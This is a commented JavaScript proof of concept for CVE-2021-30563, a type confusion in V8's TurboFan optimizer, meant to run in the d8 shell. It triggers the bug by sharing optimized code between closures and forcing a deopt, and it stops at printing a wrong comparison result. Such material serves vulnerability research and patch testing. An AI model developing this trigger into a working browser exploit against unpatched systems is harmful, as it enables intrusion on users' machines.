// PoC CVE-2021-30563 - Type Confusion in V8 (TurboFan function-context specialization)
// https://twitter.com/Zeusb0x
// Run in a V8 shell with natives syntax enabled, e.g. `d8 --allow-natives-syntax poc.js`
// (the original header reads "r --allow-natives-syntax"; `r` is presumably the author's alias for the d8 binary).
// The script is sloppy-mode on purpose: it relies on implicit globals and the d8 `print` builtin, so do not load it as a module or under 'use strict'.
// Factory for the closure under test. Every call returns a fresh closure over the
// same function literal; once one of them is optimized, a later one shares its
// optimized code object (see the fkClosure comment in the driver below).
// `shClosure` and `temp` are free variables resolved against the global object at
// call time -- they are assigned by the top-level driver that follows.
function make() {
  const foo = function(x) {
    // Capture the current global `shClosure` into a fresh array. The bug hinges on
    // the optimizer folding this closure reference during function-context
    // specialization, so it must stay a plain global read -- do not restyle.
    var ab = [shClosure];
    if (x > 10) {
      // Side effect on a global array. The driver never warms this branch up, so
      // it has no type feedback in the optimized code and taking it forces a deopt.
      temp[0] = 1;
    }
    // Should be true for every closure. On an affected V8 it becomes false once the
    // optimized code is shared with a closure other than the one it was built for.
    return ab[0] === shClosure;
  };
  return foo;
}
// Driver. NOTE: `shClosure`, `temp` and `fkClosure` are deliberately implicit
// globals (sloppy-mode script); the closure body resolves them through the global
// object, so this file must not be run as a module or under 'use strict'.
// `print` is the d8 shell builtin; substitute console.log outside d8. The
// %-prefixed calls only parse with --allow-natives-syntax.

// Step 1: build the first closure, with function context specialization.
make();

// Step 2: build a second closure and optimize it.
shClosure = make();
temp = [1];
// Warm up with x = 1 only, so the `x > 10` branch gets no feedback before
// optimization (that missing feedback is what makes the later deopt possible).
%PrepareFunctionForOptimization(shClosure);
shClosure(1);
%OptimizeFunctionOnNextCall(shClosure);
shClosure(2);

// Step 3: build a third closure over the same literal. It shares the optimized
// code object with the second closure, even though it is a different JSFunction.
fkClosure = make();
// The optimized code evaluated `ab[0] === shClosure` to a constant true, so this
// prints true regardless of which closure is actually running.
print(fkClosure(1));

// Step 4: force a deopt by taking the branch that has no feedback.
// While translating the native frame back to an interpreted one, the JSFunction
// stack slot is used to represent the closure in question (as part of a captured
// object). Because the code object is shared, ab[0] evaluates to fkClosure instead
// of shClosure, and the comparison now yields false.
// Expected output on an affected build: "true" then "false". On a build carrying
// the fix both lines should presumably print "true" -- confirm against your V8.
// This script only demonstrates the mis-identified closure; it does not by itself
// corrupt memory.
print(fkClosure(11)); // false